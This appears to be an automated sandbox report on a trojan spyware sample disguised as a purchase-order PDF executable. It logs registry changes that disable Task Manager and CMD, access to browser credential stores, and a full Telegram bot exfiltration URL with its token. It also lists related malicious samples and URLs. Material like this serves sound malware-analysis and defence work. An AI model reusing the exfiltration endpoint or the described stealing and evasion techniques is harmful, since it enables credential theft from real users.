            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594438Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594328Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594219Jump to behavior
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.0000000005688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3943
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3762
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeQueries volume information: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PURCHASE ORDER TRC-0909718-24_pdf.exe47%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.185.193
              truefalse
                high
                reallyfreegeoip.org
                188.114.97.3
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.0000000005688000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.org/-BPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2947972912.00000000385C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.comPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorPURCHASE ORDER TRC-0909718-24_pdf.exefalse
                                                          high
                                                          http://api.telegram.orgPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://drive.usercontent.google.com/tPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexPURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.250.185.193
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  188.114.97.3
                                                                  reallyfreegeoip.orgEuropean Union
                                                                  13335CLOUDFLARENETUSfalse
                                                                  142.250.186.174
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  193.122.130.0
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898USfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1576421
                                                                  Start date and time:2024-12-17 03:28:04 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 1s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@6/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:
                                                                  • Successful, ratio: 83%
                                                                  • Number of executed functions: 74
                                                                  • Number of non-executed functions: 68
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target PURCHASE ORDER TRC-0909718-24_pdf.exe, PID 7716 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  21:29:54API Interceptor43658x Sleep call for process: PURCHASE ORDER TRC-0909718-24_pdf.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                        pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                          QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                            FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rgenerousrs.store/o362/
                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.beylikduzu616161.xyz/2nga/
                                                                                      Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                      • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                      ce.vbsGet hashmaliciousUnknownBrowse
                                                                                      • paste.ee/d/lxvbq
                                                                                      Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                      • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                      PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.ssrnoremt-rise.sbs/3jsc/
                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • filetransfer.io/data-package/zWkbOqX7/download
                                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                      • kklk16.bsyo45ksda.top/favicon.ico
                                                                                      gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                      • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                      Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                      • gmtagency.online/api/check
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      reallyfreegeoip.orgJustificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.67.152
                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 172.67.177.134
                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.67.152
                                                                                      CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.67.152
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 104.21.67.152
                                                                                      checkip.dyndns.comJustificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 158.101.44.242
                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 193.122.130.0
                                                                                      CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      api.telegram.orgJustificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUJustificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      CLOUDFLARENETUShttps://tinyurl.com/5faazntxGet hashmaliciousUnknownBrowse
                                                                                      • 104.18.111.161
                                                                                      https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2dGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.16.207
                                                                                      gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      • 104.21.38.84
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                      • 104.21.2.110
                                                                                      https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                                      • 104.18.94.41
                                                                                      https://uvcr.ovactanag.ru/jQXv/Get hashmaliciousUnknownBrowse
                                                                                      • 104.17.25.14
                                                                                      https://bgf43.bookrecce.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
                                                                                      • 104.16.123.96
                                                                                      https://tinyurl.com/cueen04fmfsfGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.204.38
                                                                                      z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                      • 104.21.64.208
                                                                                      https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204adGet hashmaliciousUnknownBrowse
                                                                                      • 162.159.128.61
                                                                                      ORACLE-BMC-31898USend.exeGet hashmaliciousUnknownBrowse
                                                                                      • 130.61.86.87
